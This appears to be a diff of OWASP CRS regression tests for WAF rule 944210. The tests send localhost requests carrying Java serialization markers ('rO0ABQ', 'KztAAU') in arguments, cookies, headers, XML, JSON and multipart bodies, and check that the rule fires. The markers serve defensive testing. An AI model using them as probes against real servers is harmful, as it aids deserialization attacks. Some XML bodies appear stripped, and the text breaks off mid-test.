+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log: + expect_ids: [944210] + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log: + expect_ids: [944210] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log: + expect_ids: [944210] + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 